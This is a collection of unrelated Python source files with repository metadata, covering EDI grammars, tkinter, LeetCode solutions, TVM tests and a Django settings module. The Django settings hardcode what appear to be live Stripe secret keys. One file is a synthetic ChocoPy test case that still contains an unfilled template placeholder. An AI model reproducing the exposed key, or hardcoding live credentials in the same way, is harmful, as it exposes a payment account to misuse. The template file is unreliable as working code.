8dd2e0625d7cddc0360585244105d243400bfd8c | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/6010/504006010.py | f720a213c867cbaeb745d5d7e34ed4a67527b198 | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 844 | py | from bots.botsconfig import *
from records006010 import recorddefs
syntax = {
'version': '00601',
'functionalgroup': 'CC',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'PER', MIN: 0, MAX: 99999},
{ID: 'DTP', MIN: 0, MAX: 99999},
{ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'LQ', MIN: 1, MAX: 99999},
]},
]},
{ID: 'REF', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'DTP', MIN: 0, MAX: 99999},
{ID: 'MSG', MIN: 0, MAX: 99999},
{ID: 'LM', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'LQ', MIN: 1, MAX: 99999},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
9c0840e858c444ea844208b24a2948f9ad7256f6 | aad4481e8a54e311982d638c1b42a86180726970 | /examples/event-loop-stuff/timeout-clock.py | b5a2076df4b5ee032662cafab72effec9061d0ae | [
"Unlicense",
"Zlib"
] | permissive | jiangguoqing/tkinter-tutorial | 5639b11cfc2f339df3776410dbd7078ee07fac54 | c6fee61ee915cf0894125e5b5eeb7249237d3a6b | refs/heads/master | 2021-05-05T12:02:13.912298 | 2017-06-18T10:51:33 | 2017-06-18T10:51:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | py | import tkinter as tk
import time
# this must return soon after starting this
def change_text():
label['text'] = time.asctime()
# now we need to run this again after one second, there's no better
# way to do this than timeout here
root.after(1000, change_text)
root = tk.Tk()
label = tk.Label(root, text='0')
label.pack()
change_text() # don't forget to actually start it :)
root.geometry('200x200')
root.mainloop()
| [
"[email protected]"
] | |
cd515ac2fb82afb70c385e634c68f7f523290d90 | 1097ed333a4000634e68a590ee6ffc6129ae61e3 | /287.寻找重复数.py | f7574fcf8c3ef85cc24ac1beab25979bd36b19d0 | [
"MIT"
] | permissive | AutuanLiu/Code-Storm2019 | 1bbe890c7ca0d033c32348173bfebba612623a90 | 8efc7c5475fd888f7d86c3b08a3c1c9e55c1ac30 | refs/heads/master | 2020-04-23T07:03:08.975232 | 2019-10-24T08:56:26 | 2019-10-24T08:56:26 | 170,995,032 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | #
# @lc app=leetcode.cn id=287 lang=python3
#
# [287] 寻找重复数
#
# https://leetcode-cn.com/problems/find-the-duplicate-number/description/
#
# algorithms
# Medium (60.60%)
# Likes: 246
# Dislikes: 0
# Total Accepted: 17.2K
# Total Submissions: 28.4K
# Testcase Example: '[1,3,4,2,2]'
#
# 给定一个包含 n + 1 个整数的数组 nums,其数字都在 1 到 n 之间(包括 1 和
# n),可知至少存在一个重复的整数。假设只有一个重复的整数,找出这个重复的数。
#
# 示例 1:
#
# 输入: [1,3,4,2,2]
# 输出: 2
#
#
# 示例 2:
#
# 输入: [3,1,3,4,2]
# 输出: 3
#
#
# 说明:
#
#
# 不能更改原数组(假设数组是只读的)。
# 只能使用额外的 O(1) 的空间。
# 时间复杂度小于 O(n^2) 。
# 数组中只有一个重复的数字,但它可能不止重复出现一次。
#
#
#
# 首先进行排序
# 遍历数组 如果下一个位置的数值和当前值相等 则重复
# class Solution:
# def findDuplicate(self, nums: List[int]) -> int:
# nums = sorted(nums) # 这里开辟了新的空间 存储副本
# n = len(nums)
# for i in range(n-1):
# if nums[i] == nums[i + 1]:
# return nums[i]
# return -1
class Solution(object):
def findDuplicate(self, nums):
slow = 0
fast = 0
while True:
slow = nums[slow]
fast = nums[nums[fast]]
if slow == fast:
break
finder = 0
while True:
slow = nums[slow]
finder = nums[finder]
if slow == finder:
return slow
| [
"[email protected]"
] | |
56bb1b8a3d238c6c89226c5276b91e8649ac0852 | 660e3a2bb5f127908549d52ebc62d0d67725f832 | /Algorithm_python/최소반복.py | 289ccfc40280f63b62c7f53a788273646c84b529 | [] | no_license | dygksquf5/python_study | b56f8548bea7e31a484301bb97ddefe44d931c80 | 282126b0104dae9f9f8f63e613cc968a2f998ef1 | refs/heads/master | 2023-02-21T03:46:16.673962 | 2021-01-24T14:08:47 | 2021-01-24T14:08:47 | 294,593,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | # 주어진 수가 커서, 나머지 테스트케이스는 전부 에러ㅓㅓㅓ
def solution(arr):
answer = 0
id = [0] * len(set(str(arr)))
visited = [False] * len(id)
for i in range(len(arr)):
if not visited[arr[i] - 1]:
id[arr[i] - 1] = i
visited[arr[i] - 1] = True
continue
if visited[arr[i] - 1]:
answer = min(i - id[arr[i] - 1], id[arr[i] - 1])
id[arr[i] - 1] = max(i - id[arr[i] - 1], id[arr[i] - 1])
if answer == 0:
return -1
else:
return answer
# answer = []
# id = collections.defaultdict(list)
# for i in sorted(set(arr)):
# id[i] = [dup for dup in range(len(arr)) if arr[dup] == i] | [
"[email protected]"
] | |
eb884160b46e9b642bf272c7dd14832b474646d7 | b5e4958bd1c4770297108947e7b7441020b2e9cc | /topi/tests/python_cpp/test_topi_relu.py | f214266351210bcd11b71be64cdebdfc98b25ba6 | [
"Apache-2.0"
] | permissive | Markz2z/tvm | 06a20dcdf76111b64242940323ba998432ffbffb | 3921b938c2a14017c2624f149983e86a7f9a4e94 | refs/heads/master | 2021-09-07T22:13:37.234511 | 2018-02-27T23:14:58 | 2018-02-27T23:14:58 | 124,998,633 | 1 | 0 | Apache-2.0 | 2018-03-13T05:45:19 | 2018-03-13T05:45:19 | null | UTF-8 | Python | false | false | 2,070 | py | """Test code for relu activation"""
import os
import numpy as np
import tvm
import topi
from topi.util import get_const_tuple
def verify_relu(m, n, dtype):
A = tvm.placeholder((m, n), name='A', dtype=dtype)
B = topi.cpp.nn.relu(A)
assert B.dtype == dtype
a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
b_np = a_np * (a_np > 0)
def check_device(device):
if not tvm.module.enabled(device):
print("Skip because %s is not enabled" % device)
return
print("Running on target: %s" % device)
target = topi.cpp.TEST_create_target(device)
if device == "llvm":
s = topi.cpp.generic.schedule_injective(target, [B])
else:
s = topi.cpp.cuda.schedule_injective(target, [B])
ctx = tvm.context(device, 0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
foo = tvm.build(s, [A, B], device, name="relu")
foo(a, b)
np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
for device in ['cuda', 'opencl', 'metal', 'rocm']:
check_device(device)
def verify_leaky_relu(m, alpha):
A = tvm.placeholder((m,), name='A')
B = topi.cpp.nn.leaky_relu(A, alpha)
device = "llvm"
target = topi.cpp.TEST_create_target(device)
s = topi.cpp.generic.schedule_injective(target, [B])
a_np = np.random.uniform(size=get_const_tuple(A.shape)).astype(A.dtype)
b_np = a_np * (a_np > 0) + a_np * (a_np < 0) * alpha
ctx = tvm.cpu(0)
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(np.zeros(get_const_tuple(B.shape), dtype=B.dtype), ctx)
foo = tvm.build(s, [A, B], device, name="leaky_relu")
foo(a, b)
np.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-5)
def test_relu():
for dtype in ['float32', 'float64', 'int32', 'int16', 'int8', 'int64']:
verify_relu(10, 128, dtype)
def test_leaky_relu():
verify_leaky_relu(100, 0.1)
if __name__ == "__main__":
test_relu()
test_leaky_relu()
| [
"[email protected]"
] | |
9855a9a453ba14cf06e3fe967deea374c8fe1a86 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-677.py | bb26289d2195905caac5c6473919fe4679455e63 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,911 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
$ClassBodyMember
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"[email protected]"
] | |
ed3556874e717bbaf477fea4cadc0f06772d039c | 5e324af46c554b88b97ee26886b05c88457ff0f5 | /core/settings/production.py | 0514fd109ac361f269a79a6f0a4dcb5a3202ba61 | [] | no_license | doubleclickdetroit/dindintonight | 1bda8851e49782d4dc16ca77d46e4b1f431c2b52 | 9769e1a96730b02511d25af8828b075dff5c35b5 | refs/heads/master | 2016-08-04T22:01:08.083566 | 2014-07-26T18:58:58 | 2014-07-26T18:58:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,383 | py | """Production settings and globals."""
from os import environ
from base import *
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
########## HOST CONFIGURATION
# See: https://docs.djangoproject.com/en/1.5/releases/1.5/#allowed-hosts-required-in-production
ALLOWED_HOSTS = []
########## END HOST CONFIGURATION
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = environ.get('EMAIL_HOST', 'smtp.gmail.com')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = environ.get('EMAIL_HOST_PASSWORD', '')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = environ.get('EMAIL_HOST_USER', '[email protected]')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = environ.get('EMAIL_PORT', 587)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
DATABASES = {}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('SECRET_KEY')
########## END SECRET CONFIGURATION
########## STRIPE CREDIT CARD PROCESSING
STRIPE_SECRET_KEY = 'sk_live_oTd6djTNRxCeURqgLUYgGLl3'
STRIPE_PUBLISHABLE_KEY = 'pk_live_8zQjpc9a3HnrLCYVttDDKTMh'
########## END STRIPE CREDIT CARD PROCESSING
| [
"[email protected]"
] | |
f1d0e4bc2bf2a727d168359cf8886cbca2f8e324 | 25ebc03b92df764ff0a6c70c14c2848a49fe1b0b | /daily/20190406/example_tinyloop/06generator.py | d865c30ed0ec9c763671dcf57f05205d0cd393bb | [] | no_license | podhmo/individual-sandbox | 18db414fafd061568d0d5e993b8f8069867dfcfb | cafee43b4cf51a321f4e2c3f9949ac53eece4b15 | refs/heads/master | 2023-07-23T07:06:57.944539 | 2023-07-09T11:45:53 | 2023-07-09T11:45:53 | 61,940,197 | 6 | 0 | null | 2022-10-19T05:01:17 | 2016-06-25T11:27:04 | Python | UTF-8 | Python | false | false | 240 | py | def f():
x = yield 1
print("@", x)
y = yield 2
print("@", y)
return x, y
itr = f()
v = next(itr)
print("!", v)
v = itr.send([v])
print("!", v)
try:
print(itr.send([v]))
except StopIteration as e:
print(e.args)
| [
"[email protected]"
] | |
43b6ce6cceabe1e527d08133bda8568d38084a2c | 8156f7278a568531f808edfa3cb9cc64090eba17 | /dmhy/getTracker.py | e56307b6feebcbc45cfbffcc4109d0bd8007886d | [] | no_license | DeSireFire/My_Spyder_Pool | 8ef3cfad7911e9e66e0993fb3fa73d10d75e4a7d | ead5d90fd8d532c3f96fb02ac8a1aa15697d8196 | refs/heads/master | 2023-04-06T00:41:12.706009 | 2021-04-29T13:20:59 | 2021-04-29T13:20:59 | 109,140,291 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,351 | py | import requests
URLS = {
'trackers_best':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_best.txt',
'trackers_all':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all.txt',
'trackers_all_udp':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_udp.txt',
'trackers_all_http':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_http.txt',
'trackers_all_https':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_https.txt',
'trackers_all_ws':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_ws.txt',
'trackers_best_ip':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_best_ip.txt',
'trackers_all_ip':'https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all_ip.txt',
}
_header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
}
def getBest(URL,_header,_str = False):
'''
获取git上的Tracker,提高磁链的下载速度
:param URL: 字符串,请求的URL地址
:param _header: 字典,请求的网页头部
:param _str: 布尔值,是否将结果拼接成字符串。
:return: 根据变量_str,来决定试输出字符串还是列表
'''
_respone = requests.get(url=URL,headers=_header)
if _str:
print(''.join(list(map(lambda x: '&tr='+x,_respone.text.split()))))
return ''.join(list(map(lambda x: '&tr='+x,_respone.text.split())))
else:
print(list(map(lambda x: '&tr='+x,_respone.text.split())))
return list(map(lambda x: '&tr='+x,_respone.text.split()))
if __name__ == '__main__':
for k in URLS:
getBest(URLS[k],_header,True)
getBest(URLS[k],_header)
